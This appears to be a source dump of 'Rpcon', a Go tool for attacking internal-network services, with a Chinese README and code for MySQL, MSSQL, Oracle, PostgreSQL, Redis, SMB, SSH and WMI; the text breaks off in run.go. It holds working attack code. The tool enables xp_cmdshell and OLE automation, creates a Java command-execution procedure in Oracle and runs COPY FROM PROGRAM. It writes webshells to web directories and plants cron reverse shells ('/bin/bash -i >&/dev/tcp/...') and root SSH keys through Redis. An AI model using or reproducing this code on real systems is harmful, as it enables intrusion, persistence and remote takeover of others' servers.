├── README.md
├── cmd
    ├── mssql.go
    ├── mysql.go
    ├── oracle.go
    ├── postgresql.go
    ├── redis.go
    ├── run.go
    ├── smb.go
    ├── ssh.go
    └── wmiex.go
├── common
    ├── config.go
    ├── flag.go
    └── parse.go
├── go.mod
├── go.sum
├── main.go
└── pkg
    ├── PrintRow.go
    ├── log.go
    ├── readfile.go
    └── wmiexec.go

/README.md:
--------------------------------------------------------------------------------
# Rpcon

内网远程连接利用工具,用于ssh smb 等常规服务

目前支持ssh远程连接执行命令

## 2023.3.24更新:

redis远程连接执行命令 redis一键写入webshell,一键反弹shell,一键写入公钥

## 2023.3.26更新:

mysql远程连接执行命令 mysql一键写入webshell

## 2023.3.27更新:

wmiexec无回显命令执行

## 2023.3.28更新:

优化某些代码

mssql模块

1:xcmdhshell 一键利用

2:OLE一键利用

## 2023.3.29更新:

oracle利用模块:shellrun函数执行系统命令

关于oracle模块报错

## 2023.3.30更新:

暂时移除oracle 使用可以从cmd/oracle.go import包中去除//再按照上文参考配置

PostgreSQL模块

1:一键写入webshell

2:命令执行

Smb模块

## 2023.4.4更新

解决linux打包问题

使用方法:

```
写入shell默认为
-p 指定端口
-f 指定文件 列入shell文件
-pt 写入目录
-u 用户
-pw 密码
-d 指定数据库名称
-c 执行的命令或者数据库语法

mysql:
执行查询
rpcon -u root -pw root -m mysql -c "show databases;"
一键写shell:
rpcon -u root -pw root -r mysl -f sss/1.php -pt /var/html/www
一键读取配置
rpcon -u root -pw root -r mycg

redis:
执行查询
rpcon -u -pw -m redis -c ""
一键写入公钥
rpcon -u -pw -r rk -pt rsa.xx
一键写入shell
rpcon -u -pw -r rs -f 11.php -pt 目标目录
一键反弹shell <有点鸡肋某些情况会反弹失败>
rpcon -u -pw -r rn -ws 8.8.8.8 -wp 666


mssql
执行查询:
rpcon -u sa -pw sa -m mssql -c ""
读取配置:
rpcon -u sa -pw sa -r mssg
执行命令
rpcon -u sa -pw sa -r cmdshell -c whoami
rpcon -u sa -pw sa -r oleshell -c whoami

oracle:
执行查询:
rpcon -u sys -pw sys -m oracle -c ""
读取配置
rpcon -u sys -pw sys -r org
执行命令
rpcon -u sys -pw sys -r ors -c whoami

postgresql
执行查询:
rpcon -u postgres -pw 123456 -m postgres -c ""
读取配置
rpcon -u postgres -pw 123456 -r pocfg
写入shell
rpcon -u postgres -pw 123456 -r poshell -f 11.php -pt /var/html/www
执行命令
rpcon -u postgres -pw 123456 -r pocde -c whoami


wmiexec:
rpcon -u administrators -pw 123456 -m wmi -c
hash:
rpcon -u administrators -hash aaaaaaaaa -m wmi -c

smb:
rpcon -u administrators -pw 123456 -f 文件 -pt 目录
hash:
rpcon -u administrators -hash aaaaaaaaa -f 文件 -pt 目录
```

--------------------------------------------------------------------------------
/cmd/mssql.go:
--------------------------------------------------------------------------------
1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "database/sql" 7 | "fmt" 8 | _ "github.com/denisenkom/go-mssqldb" 9 | "log" 10 | ) 11 | 12 | var cfgquery = []string{"select @@VERSION", 13 | "SELECT name FROM MASter..SysDatabASes ORDER BY name", 14 | "select IS_SRVROLEMEMBER('sysadmin')", 15 | "select IS_MEMBER('db_owner')", 16 | "select is_srvrolemember('public')", 17 | "SELECT SysObjects.name AS Tablename FROM sysobjects WHERE xtype = 'U' and sysstat<200", 18 | "select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'", //查看cmdshell状态 19 | "select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';", //查看sp_oacreate状态 1存在 20 | } 21 | var msexp = []string{ 22 | ";EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--", //开启cmdshell 23 | "exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;--", //开启OLE 无回显 24 | } 25 | 26 | func Msscon() (*sql.DB, error) { 27 | dns := fmt.Sprintf("server=%s;port%d;database=%s;user 
id=%s;password=%s;encrypt=disable", common.Host, common.Port, common.DBname, common.User, common.Password) 28 | if isdebug { 29 | fmt.Println(dns) 30 | } 31 | conn, err := sql.Open("mssql", dns) 32 | if err != nil { 33 | log.Fatal("Open Connection failed:", err.Error()) 34 | } 35 | return conn, err 36 | } 37 | 38 | func Mssquery() { 39 | conn, _ := Msscon() 40 | stmt, err := conn.Prepare(common.Code) 41 | if err != nil { 42 | log.Fatal("Prepare failed:", err.Error()) 43 | } 44 | defer stmt.Close() 45 | //通过Statement执行查询 46 | rows, err := stmt.Query() 47 | if err != nil { 48 | log.Fatal("Query failed:", err.Error()) 49 | } 50 | 51 | //建立一个列数组 52 | cols, err := rows.Columns() 53 | var colsdata = make([]interface{}, len(cols)) 54 | for i := 0; i < len(cols); i++ { 55 | colsdata[i] = new(interface{}) 56 | fmt.Print(cols[i]) 57 | fmt.Print("\t") 58 | } 59 | fmt.Println() 60 | 61 | //遍历每一行 62 | for rows.Next() { 63 | rows.Scan(colsdata...) //将查到的数据写入到这行中 64 | pkg.PrintRow(colsdata) //打印此行 65 | } 66 | defer rows.Close() 67 | defer func() { defer conn.Close() }() 68 | } 69 | 70 | func Msscfg() { 71 | conn, _ := Msscon() 72 | for i := range cfgquery { 73 | stmt, err := conn.Prepare(cfgquery[i]) 74 | if err != nil { 75 | log.Fatal("Prepare failed:", err.Error()) 76 | } 77 | defer stmt.Close() 78 | //通过Statement执行查询 79 | rows, err := stmt.Query() 80 | if err != nil { 81 | log.Fatal("Query failed:", err.Error()) 82 | } 83 | 84 | //建立一个列数组 85 | cols, err := rows.Columns() 86 | var colsdata = make([]interface{}, len(cols)) 87 | for i := 0; i < len(cols); i++ { 88 | colsdata[i] = new(interface{}) 89 | fmt.Print(cols[i]) 90 | fmt.Print("\t") 91 | } 92 | fmt.Println() 93 | 94 | //遍历每一行 95 | for rows.Next() { 96 | rows.Scan(colsdata...) 
//将查到的数据写入到这行中 97 | pkg.PrintRow(colsdata) //打印此行 98 | } 99 | defer rows.Close() 100 | } 101 | defer func() { conn.Close() }() 102 | } 103 | 104 | func Cmdshell() { 105 | conn, err := Msscon() 106 | if err != nil { 107 | fmt.Println(err) 108 | } 109 | conn.Query(";EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--") 110 | Code := fmt.Sprintf("exec master..xp_cmdshell '%v'", common.Code) 111 | stmt, err := conn.Prepare(Code) 112 | if err != nil { 113 | log.Fatal("Prepare failed:", err.Error()) 114 | } 115 | defer stmt.Close() 116 | //通过Statement执行查询 117 | rows, err := stmt.Query() 118 | if err != nil { 119 | log.Fatal("Query failed:", err.Error()) 120 | } 121 | 122 | //建立一个列数组 123 | cols, err := rows.Columns() 124 | var colsdata = make([]interface{}, len(cols)) 125 | for i := 0; i < len(cols); i++ { 126 | colsdata[i] = new(interface{}) 127 | fmt.Print(cols[i]) 128 | fmt.Print("\t") 129 | } 130 | fmt.Println() 131 | 132 | //遍历每一行 133 | for rows.Next() { 134 | rows.Scan(colsdata...) 
//将查到的数据写入到这行中 135 | pkg.PrintRow(colsdata) //打印此行 136 | } 137 | defer rows.Close() 138 | defer func() { conn.Close() }() 139 | } 140 | 141 | func Oleshell() { 142 | conn, err := Msscon() 143 | if err != nil { 144 | fmt.Println(err) 145 | } 146 | conn.Query("exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;--") 147 | Code := fmt.Sprintf("declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\\windows\\system32\\cmd.exe /c %v >c:\\\\1.txt'", common.Code) 148 | stmt, err := conn.Prepare(Code) 149 | if err != nil { 150 | log.Fatal("Prepare failed:", err.Error()) 151 | } 152 | defer stmt.Close() 153 | //通过Statement执行查询 154 | rows, err := stmt.Query() 155 | if err != nil { 156 | log.Fatal("Query failed:", err.Error()) 157 | } 158 | 159 | //建立一个列数组 160 | cols, err := rows.Columns() 161 | var colsdata = make([]interface{}, len(cols)) 162 | for i := 0; i < len(cols); i++ { 163 | colsdata[i] = new(interface{}) 164 | fmt.Print(cols[i]) 165 | fmt.Print("\t") 166 | } 167 | fmt.Println() 168 | 169 | //遍历每一行 170 | for rows.Next() { 171 | rows.Scan(colsdata...) 
//将查到的数据写入到这行中 172 | pkg.PrintRow(colsdata) //打印此行 173 | } 174 | defer rows.Close() 175 | defer func() { conn.Close() }() 176 | } 177 | 178 | func CLR() { 179 | conn, _ := Msscon() 180 | conn.Query("exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;--") 181 | 182 | } 183 | -------------------------------------------------------------------------------- /cmd/mysql.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "database/sql" 7 | "fmt" 8 | _ "github.com/go-sql-driver/mysql" 9 | "log" 10 | ) 11 | 12 | var ( 13 | mysqread = []string{"SELECT LOAD_FILE('/etc/passwd')", "select user()", "show variables like '%plugins%' ;", "select @@version_compile_os", "SELECT LOAD_FILE('/etc/nginx/nginx.conf' )", "show global variables like 'secure%';", "show variables like '%general%';"} 14 | isdebug = true 15 | key string 16 | aaa string 17 | ) 18 | 19 | func mysqlcmd() (*sql.DB, error) { 20 | dns := fmt.Sprintf("%v:%v@(%v:%v)/%v", common.User, common.Password, common.Host, common.Port, common.DBname) 21 | if isdebug { 22 | 23 | } 24 | db, err := sql.Open("mysql", dns) 25 | if err != nil { 26 | log.Fatal("Open Connection failed:", err.Error()) 27 | } 28 | db.SetMaxOpenConns(20) 29 | db.SetMaxIdleConns(10) 30 | return db, err 31 | } 32 | 33 | func Query() { 34 | 35 | db, _ := mysqlcmd() 36 | db.Ping() 37 | if common.Code != "" { 38 | stmt, err := db.Prepare(common.Code) 39 | if err != nil { 40 | log.Fatal("Prepare failed:", err.Error()) 41 | } 42 | defer stmt.Close() 43 | //通过Statement执行查询 44 | rows, err := stmt.Query() 45 | if err != nil { 46 | log.Fatal("Query failed:", err.Error()) 47 | } 48 | 49 | //建立一个列数组 50 | cols, err := rows.Columns() 51 | var colsdata = make([]interface{}, len(cols)) 52 | for i := 0; i < len(cols); i++ { 53 | colsdata[i] = new(interface{}) 54 | fmt.Print(cols[i]) 55 | 
fmt.Print("\t") 56 | } 57 | fmt.Println() 58 | 59 | //遍历每一行 60 | for rows.Next() { 61 | rows.Scan(colsdata...) //将查到的数据写入到这行中 62 | pkg.PrintRow(colsdata) //打印此行 63 | } 64 | defer rows.Close() 65 | defer func() { db.Close() }() 66 | } 67 | } 68 | 69 | func Mysqlshell() { 70 | db, err := mysqlcmd() 71 | if common.File != "" { 72 | key, err = pkg.Readfile(common.File) 73 | if err != nil { 74 | fmt.Println("打开文件失败") 75 | } 76 | } else { 77 | key = "" 78 | } 79 | path := fmt.Sprintf("select '%s' into outfile '%s';", key, common.Path) 80 | ss, err := db.Query(path) 81 | if err != nil { 82 | fmt.Println("写入shell失败,目标没有写入权限或者文件名相同 请重新确认文件名和路径") 83 | } else { 84 | log.Println("写入shell成功") 85 | } 86 | for ss.Next() { 87 | err := ss.Scan(&aaa) 88 | if err != nil { 89 | log.Println(err) 90 | } 91 | log.Println("写入shell成功") 92 | } 93 | defer func() { db.Close() }() 94 | } 95 | 96 | func Myconfig() { 97 | db, _ := mysqlcmd() 98 | for i, _ := range mysqread { 99 | stmt, err := db.Prepare(mysqread[i]) 100 | if err != nil { 101 | log.Fatal("Prepare failed:", err.Error()) 102 | } 103 | defer stmt.Close() 104 | //通过Statement执行查询 105 | rows, err := stmt.Query() 106 | if err != nil { 107 | log.Fatal("Query failed:", err.Error()) 108 | } 109 | 110 | //建立一个列数组 111 | cols, err := rows.Columns() 112 | var colsdata = make([]interface{}, len(cols)) 113 | for i := 0; i < len(cols); i++ { 114 | colsdata[i] = new(interface{}) 115 | fmt.Print(cols[i]) 116 | fmt.Print("\t") 117 | } 118 | fmt.Println() 119 | 120 | //遍历每一行 121 | for rows.Next() { 122 | rows.Scan(colsdata...) 
//将查到的数据写入到这行中 123 | pkg.PrintRow(colsdata) //打印此行 124 | } 125 | defer rows.Close() 126 | } 127 | defer func() { db.Close() }() 128 | } 129 | -------------------------------------------------------------------------------- /cmd/oracle.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "database/sql" 7 | "fmt" 8 | _ "github.com/sijms/go-ora/v2" 9 | "log" 10 | ) 11 | 12 | //https://www.cnblogs.com/jiangyuqin/p/10135963.html 13 | var cfg = []string{ 14 | "SELECT * FROM session_privs;\n", 15 | "SELECT * FROM session_privs;\n", 16 | "SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';\n", //查询数据库版本信息 17 | "SELECT banner FROM v$version where banner like 'TNS%';\n", //查询操作系统版本 18 | "SELECT UTL_INADDR.get_host_name FROM dual;\n", //查询主机名 19 | "SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';\n", //查询所有dba用户 20 | } 21 | 22 | var exp = []string{`create or replace and resolve java source named "JavaUtil" as 23 | import java.io.*; 24 | public class JavaUtil extends Object 25 | { 26 | public static String ExecCommand(String cmd) 27 | { 28 | try { 29 | BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); 30 | String stemp,str = ""; 31 | while ((stemp = myReader.readLine()) != null) str += stemp + "\n"; 32 | myReader.close(); 33 | return str; 34 | } catch (Exception e){ 35 | return e.toString(); 36 | } 37 | } 38 | } 39 | `, 40 | `create or replace function ExecCommand(cmd in varchar2) return varchar2 41 | as 42 | language java 43 | name 'JavaUtil.ExecCommand(java.lang.String) return String'; 44 | `, 45 | } 46 | 47 | func Orconn() (*sql.DB, error) { 48 | if common.DBname == "" { 49 | common.DBname = "orcl" 50 | dns := fmt.Sprintf("oracle://%s:%s@%s:%v/%s", common.User, common.Password, common.Host, common.Port) 51 | fmt.Println(dns) 52 | conn, err := sql.Open("oracle", dns) 53 | 
if err != nil { 54 | log.Fatal("Open Connection failed:", err.Error()) 55 | } 56 | return conn, err 57 | } else { 58 | dns := fmt.Sprintf("oracle://%s:%s@%s:%v/%s", common.User, common.Password, common.Host, common.Port, common.DBname) 59 | fmt.Println(dns) 60 | conn, err := sql.Open("oracle", dns) 61 | if err != nil { 62 | log.Fatal("Open Connection failed:", err.Error()) 63 | } 64 | return conn, err 65 | } 66 | } 67 | 68 | func ORquery() { 69 | conn, _ := Orconn() 70 | stmt, err := conn.Prepare(common.Code) 71 | rows, err := stmt.Query() 72 | if err != nil { 73 | log.Fatal("Query failed:", err.Error()) 74 | } 75 | 76 | //建立一个列数组 77 | cols, err := rows.Columns() 78 | var colsdata = make([]interface{}, len(cols)) 79 | for i := 0; i < len(cols); i++ { 80 | colsdata[i] = new(interface{}) 81 | fmt.Print(cols[i]) 82 | fmt.Print("\t") 83 | } 84 | fmt.Println() 85 | 86 | //遍历每一行 87 | for rows.Next() { 88 | rows.Scan(colsdata...) //将查到的数据写入到这行中 89 | pkg.PrintRow(colsdata) //打印此行 90 | } 91 | defer rows.Close() 92 | defer func() { conn.Close() }() 93 | } 94 | 95 | func ORcfg() { 96 | conn, _ := Orconn() 97 | for i := range cfg { 98 | stmt, err := conn.Prepare(cfg[i]) 99 | if err != nil { 100 | log.Fatal("Prepare failed:", err.Error()) 101 | } 102 | //通过Statement执行查询 103 | rows, err := stmt.Query() 104 | if err != nil { 105 | log.Fatal("Query failed:", err.Error()) 106 | } 107 | 108 | //建立一个列数组 109 | cols, err := rows.Columns() 110 | var colsdata = make([]interface{}, len(cols)) 111 | for i := 0; i < len(cols); i++ { 112 | colsdata[i] = new(interface{}) 113 | fmt.Print(cols[i]) 114 | fmt.Print("\t") 115 | } 116 | fmt.Println() 117 | 118 | //遍历每一行 119 | for rows.Next() { 120 | rows.Scan(colsdata...) 
//将查到的数据写入到这行中 121 | pkg.PrintRow(colsdata) //打印此行 122 | } 123 | } 124 | defer func() { conn.Close() }() 125 | } 126 | 127 | func ORacleshell() { 128 | conn, err := Orconn() 129 | if err != nil { 130 | log.Println(err) 131 | } 132 | for i := range exp { 133 | a, err := conn.Prepare(exp[i]) 134 | if err != nil { 135 | log.Print("提权失败") 136 | log.Print("1") 137 | log.Print(err) 138 | } 139 | _, err = a.Query() 140 | if err != nil { 141 | log.Print("提权失败") 142 | log.Print(err) 143 | } 144 | } 145 | ORcleCode := fmt.Sprintf(`select ExecCommand('%s') from dual`, common.Code) 146 | stmt, err := conn.Prepare(ORcleCode) 147 | if err != nil { 148 | log.Fatal("Prepare failed:", err.Error()) 149 | } 150 | defer stmt.Close() 151 | //通过Statement执行查询 152 | rows, err := stmt.Query() 153 | if err != nil { 154 | log.Fatal("Query failed:", err.Error()) 155 | } 156 | 157 | //建立一个列数组 158 | cols, err := rows.Columns() 159 | var colsdata = make([]interface{}, len(cols)) 160 | for i := 0; i < len(cols); i++ { 161 | colsdata[i] = new(interface{}) 162 | fmt.Print(cols[i]) 163 | fmt.Print("\t") 164 | } 165 | fmt.Println() 166 | 167 | //遍历每一行 168 | for rows.Next() { 169 | rows.Scan(colsdata...) 
//将查到的数据写入到这行中 170 | pkg.PrintRow(colsdata) //打印此行 171 | } 172 | defer rows.Close() 173 | defer func() { conn.Close() }() 174 | } 175 | -------------------------------------------------------------------------------- /cmd/postgresql.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "database/sql" 7 | "fmt" 8 | _ "github.com/lib/pq" 9 | "log" 10 | "os" 11 | ) 12 | 13 | var shell string 14 | 15 | var pocfg = []string{"select version();", 16 | "SELECT current_setting('server_version_num');", 17 | "SELECT current_setting('is_superuser');", 18 | //"postgres=# \\du", 19 | //"SELECT usename, passwd FROM pg_shadow;\n", 20 | // "copy (select '') to '/tmp/1.php';", 21 | "select setting from pg_settings where name='config_file'", 22 | "select setting from pg_settings where name = 'data_directory';", 23 | // "select/**/PG_READ_FILE($$/etc/passwd$$)", 24 | //"DROP TABLE IF EXISTS cmd_exec;", 25 | //"CREATE TABLE cmd_exec(cmd_output text);", 26 | //"copy cmd_exec FROM PROGRAM 'whoami';", 27 | //"SELECT * FROM cmd_exec;", 28 | } 29 | 30 | func Postconn() (*sql.DB, error) { 31 | pdqlInfo := fmt.Sprintf("host=%s port=%d user=%s "+"password=%s dbname=%s", common.Host, common.Port, common.User, common.Password, common.DBname) 32 | db, err := sql.Open("postgres", pdqlInfo) 33 | if err != nil { 34 | log.Println("Open Connection failed:", err.Error()) 35 | os.Exit(0) 36 | } 37 | //db.SetMaxOpenConns(20) //设置数据库连接池最大连接数 38 | //db.SetMaxIdleConns(10) //设置最大空闲连接数 39 | //defer db.Close() 40 | return db, err 41 | } 42 | 43 | func Powriteshell() { 44 | conn, err := Postconn() 45 | if common.File != "" { 46 | shell, err = pkg.Readfile(common.File) 47 | if err != nil { 48 | log.Println("打开文件失败") 49 | } 50 | } else { 51 | shell = "" 52 | } 53 | webshell := fmt.Sprintf("copy (select '%s') to '%s';", shell, common.Path) 54 | _, err = conn.Query(webshell) 55 | if err != nil { 56 | 
log.Println("写入shell失败", err) 57 | } else { 58 | log.Println("写入shell成功") 59 | } 60 | } 61 | 62 | func Pocode() { 63 | conn, _ := Postconn() 64 | //通过Statement执行查询 65 | code := fmt.Sprintf("copy cmd_exec FROM PROGRAM '%s';", common.Code) 66 | conn.Query("DROP TABLE IF EXISTS cmd_exec;") 67 | conn.Query("CREATE TABLE cmd_exec(cmd_output text);") 68 | conn.Query(code) 69 | 70 | rows, err := conn.Query("SELECT * FROM cmd_exec;") 71 | if err != nil { 72 | log.Fatal("Query failed:", err.Error()) 73 | } 74 | 75 | //建立一个列数组 76 | cols, err := rows.Columns() 77 | var colsdata = make([]interface{}, len(cols)) 78 | for i := 0; i < len(cols); i++ { 79 | colsdata[i] = new(interface{}) 80 | //fmt.Print(cols[i]) 81 | fmt.Print("\t") 82 | } 83 | fmt.Println() 84 | 85 | //遍历每一行 86 | for rows.Next() { 87 | rows.Scan(colsdata...) //将查到的数据写入到这行中 88 | pkg.PrintRow(colsdata) //打印此行 89 | } 90 | defer rows.Close() 91 | defer conn.Close() 92 | 93 | } 94 | 95 | func PoQuery() { 96 | conn, _ := Postconn() 97 | stmt, err := conn.Prepare(common.Code) 98 | if err != nil { 99 | log.Fatal("Prepare failed:", err.Error()) 100 | } 101 | defer stmt.Close() 102 | //通过Statement执行查询 103 | rows, err := stmt.Query() 104 | if err != nil { 105 | log.Fatal("Query failed:", err.Error()) 106 | } 107 | 108 | //建立一个列数组 109 | cols, err := rows.Columns() 110 | var colsdata = make([]interface{}, len(cols)) 111 | for i := 0; i < len(cols); i++ { 112 | colsdata[i] = new(interface{}) 113 | fmt.Print(cols[i]) 114 | fmt.Print("\t") 115 | } 116 | fmt.Println() 117 | 118 | //遍历每一行 119 | for rows.Next() { 120 | rows.Scan(colsdata...) 
//将查到的数据写入到这行中 121 | pkg.PrintRow(colsdata) //打印此行 122 | } 123 | defer rows.Close() 124 | } 125 | 126 | func Pocfg() { 127 | conn, err := Postconn() 128 | if err != nil { 129 | fmt.Println(err) 130 | } 131 | for i := range pocfg { 132 | rows, err := conn.Query(pocfg[i]) 133 | if err != nil { 134 | log.Fatal("Query failed:", err.Error()) 135 | } 136 | 137 | //建立一个列数组 138 | cols, err := rows.Columns() 139 | var colsdata = make([]interface{}, len(cols)) 140 | for i := 0; i < len(cols); i++ { 141 | colsdata[i] = new(interface{}) 142 | fmt.Print(cols[i]) 143 | //fmt.Print("\t") 144 | } 145 | fmt.Println() 146 | 147 | //遍历每一行 148 | for rows.Next() { 149 | rows.Scan(colsdata...) //将查到的数据写入到这行中 150 | pkg.PrintRow(colsdata) //打印此行 151 | } 152 | defer rows.Close() 153 | defer conn.Close() 154 | } 155 | } 156 | -------------------------------------------------------------------------------- /cmd/redis.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "Rpcon/pkg" 6 | "bufio" 7 | "context" 8 | "fmt" 9 | "github.com/go-redis/redis/v8" 10 | "os" 11 | "strconv" 12 | "strings" 13 | ) 14 | 15 | var s string 16 | 17 | func con() (*redis.Client, context.Context) { 18 | 19 | // 快速入门: 20 | // 连接、执行命令 21 | ctx := context.Background() 22 | ctx.Done() 23 | 24 | rdb := redis.NewClient(&redis.Options{ 25 | Addr: common.Host + ":" + strconv.Itoa(common.Port), 26 | Username: "", 27 | Password: common.Password, 28 | DB: 0, 29 | }) 30 | // Redis 31 | return rdb, ctx 32 | 33 | } 34 | 35 | func Codes() { 36 | rdb, ctx := con() 37 | fmt.Println(rdb.String()) 38 | ss := strings.Fields(common.Code) 39 | switch len(ss) { 40 | case 7: 41 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2], ss[3], ss[4], ss[5], ss[6]).Result() 42 | if err == redis.Nil { 43 | fmt.Println("command not found") 44 | } else { 45 | fmt.Println(val2) 46 | } 47 | if val2 == nil { 48 | return 49 | } 50 | case 6: 51 | val2, err := 
rdb.Do(ctx, ss[0], ss[1], ss[2], ss[3], ss[4], ss[5]).Result() 52 | if err == redis.Nil { 53 | fmt.Println("command not found") 54 | } else { 55 | fmt.Println(val2) 56 | } 57 | if val2 == nil { 58 | return 59 | } 60 | case 5: 61 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2], ss[3], ss[4]).Result() 62 | if err == redis.Nil { 63 | fmt.Println("command not found") 64 | } else { 65 | fmt.Println(val2) 66 | } 67 | if val2 == nil { 68 | return 69 | } 70 | case 4: 71 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2], ss[3]).Result() 72 | if err == redis.Nil { 73 | fmt.Println("command not found") 74 | } else { 75 | fmt.Println(val2) 76 | } 77 | if val2 == nil { 78 | return 79 | } 80 | case 3: 81 | val2, err := rdb.Do(ctx, ss[0], ss[1], ss[2]).Result() 82 | if err == redis.Nil { 83 | fmt.Println("command not found") 84 | } else { 85 | fmt.Println(val2) 86 | } 87 | 88 | case 2: 89 | val2, err := rdb.Do(ctx, ss[0], ss[1]).Result() 90 | if err == redis.Nil { 91 | fmt.Println("command not found") 92 | } else { 93 | fmt.Println(val2) 94 | } 95 | if val2 == nil { 96 | return 97 | } 98 | case 1: 99 | val2, err := rdb.Do(ctx, ss[0]).Result() 100 | if err == redis.Nil { 101 | fmt.Println("command not found") 102 | } else { 103 | fmt.Println(val2) 104 | } 105 | if val2 == nil { 106 | return 107 | } 108 | case 0: 109 | return 110 | } 111 | } 112 | 113 | func Wshell() { 114 | rdb, ctx := con() 115 | // Redis 116 | val2 := rdb.Do(ctx, "config", "set", "dir", common.Path).String() 117 | fmt.Println("\n" + val2) 118 | if strings.Contains(val2, "OK") { 119 | val3 := rdb.Do(ctx, "config", "set", "dbfilename", "shell.php").String() 120 | fmt.Printf("\n" + val3) 121 | if strings.Contains(val3, "OK") { 122 | if common.File != "" { 123 | s, _ = pkg.Readfile(common.File) 124 | s = fmt.Sprintf("\r\n\r\n%s\r\n\r\n", common.File) 125 | } else { 126 | s = "\r\n\r\n\r\n\r\n" 127 | } 128 | val4 := rdb.Do(ctx, "set", "xxx", s).String() 129 | fmt.Println("\n" + val4) 130 | if strings.Contains(val4, "OK") 
{ 131 | _, err := rdb.Do(ctx, "save").Result() 132 | if err != nil { 133 | fmt.Println("\n写入shell失败") 134 | } 135 | } else { 136 | fmt.Println("\n写入shell失败") 137 | } 138 | } else { 139 | fmt.Println("\n写入shell失败") 140 | } 141 | } 142 | } 143 | 144 | func ncshell() { 145 | ubuntu() 146 | censell() 147 | } 148 | 149 | func ubuntu() { 150 | rdb, ctx := con() 151 | exp := fmt.Sprintf("\n\n*/1 * * * * /bin/bash -i >&/dev/tcp/%v/%v 0>&1\n\n", common.Wshell, common.Wport) 152 | val2 := rdb.Do(ctx, "set", "xxxxxxxxxzzzzzzzzz", exp).String() 153 | fmt.Println(val2) 154 | if strings.Contains(val2, "OK") { 155 | val3 := rdb.Do(ctx, "config", "set", "dir", "/var/spool/cron/crontabs/").String() 156 | fmt.Println(val3) 157 | if strings.Contains(val3, "OK") { 158 | val4 := rdb.Do(ctx, "config", "set", "dbfilename", "root").String() 159 | fmt.Println(val4) 160 | if strings.Contains(val4, "OK") { 161 | _, err := rdb.Do(ctx, "save").Result() 162 | if err != nil { 163 | fmt.Println("写入计划任务失败") 164 | } 165 | } 166 | } else { 167 | fmt.Println("写入计划任务失败") 168 | } 169 | } else { 170 | fmt.Println("写入计划任务失败") 171 | } 172 | } 173 | 174 | func censell() { 175 | rdb, ctx := con() 176 | exp := fmt.Sprintf("\n\n* * * * * /bin/bash -i >&/dev/tcp/%v/%v 0>&1\n\n", common.Wshell, common.Wport) 177 | val2 := rdb.Do(ctx, "set", "xxxzzzzzzzzzzzzzzzzzzzzzzzzz", exp).String() 178 | fmt.Println(val2) 179 | if strings.Contains(val2, "OK") { 180 | val3 := rdb.Do(ctx, "config", "set", "dir", "/var/spool/cron/").String() 181 | fmt.Println(val3) 182 | if strings.Contains(val3, "OK") { 183 | val4 := rdb.Do(ctx, "config", "set", "dbfilename", "root").String() 184 | fmt.Println(val4) 185 | if strings.Contains(val4, "OK") { 186 | _, err := rdb.Do(ctx, "save").Result() 187 | if err != nil { 188 | fmt.Println("写入计划任务失败") 189 | } 190 | } 191 | } else { 192 | fmt.Println("写入计划任务失败") 193 | } 194 | } else { 195 | fmt.Println("写入计划任务失败") 196 | } 197 | } 198 | 199 | func Wkey() { 200 | rdb, ctx := con() 201 | key, err 
:= readfile(common.Path) 202 | if err != nil { 203 | text := fmt.Sprintf("the key file %s is emty", common.Path) 204 | fmt.Println(text) 205 | } 206 | if len(key) == 0 { 207 | text := fmt.Sprintf("the keyfile %s is empty", common.Path) 208 | fmt.Println(text) 209 | } 210 | exp := fmt.Sprintf("\n\n%v\n\n", key) 211 | xx := rdb.Do(ctx, "set", "x", exp).String() 212 | fmt.Println(xx) 213 | if strings.Contains(xx, "OK") { 214 | xx1 := rdb.Do(ctx, "config", "set", "dir", "/root/.ssh").String() 215 | fmt.Println(xx1) 216 | if strings.Contains(xx1, "OK") { 217 | xx2 := rdb.Do(ctx, "config", "set", "dbfilename", "authorized_keys").String() 218 | fmt.Println(xx2) 219 | if strings.Contains(xx2, "OK") { 220 | xx3 := rdb.Do(ctx, "save") 221 | fmt.Println(xx3) 222 | } 223 | } 224 | } 225 | 226 | } 227 | 228 | func readfile(string) (string, error) { 229 | file, err := os.Open(common.Path) 230 | if err != nil { 231 | return "", err 232 | } 233 | defer file.Close() 234 | scanner := bufio.NewScanner(file) 235 | for scanner.Scan() { 236 | text := strings.TrimSpace(scanner.Text()) 237 | if text != "" { 238 | return text, nil 239 | } 240 | } 241 | return "", err 242 | } 243 | -------------------------------------------------------------------------------- /cmd/run.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | ) 6 | 7 | func Parse() { 8 | common.Parse() 9 | if common.Method != "" { 10 | switch common.Method { 11 | case "ssh": 12 | common.Port = 22 13 | Sshcmd() 14 | case "redis": 15 | common.Port = 6379 16 | Codes() 17 | case "mysql": 18 | common.Port = 3306 19 | Query() 20 | case "mssql": 21 | common.Port = 1433 22 | Mssquery() 23 | case "oracle": 24 | common.Port = 1521 25 | ORquery() 26 | case "postgresql": 27 | common.Port = 5432 28 | PoQuery() 29 | case "smb": 30 | common.Port = 445 31 | Smb() 32 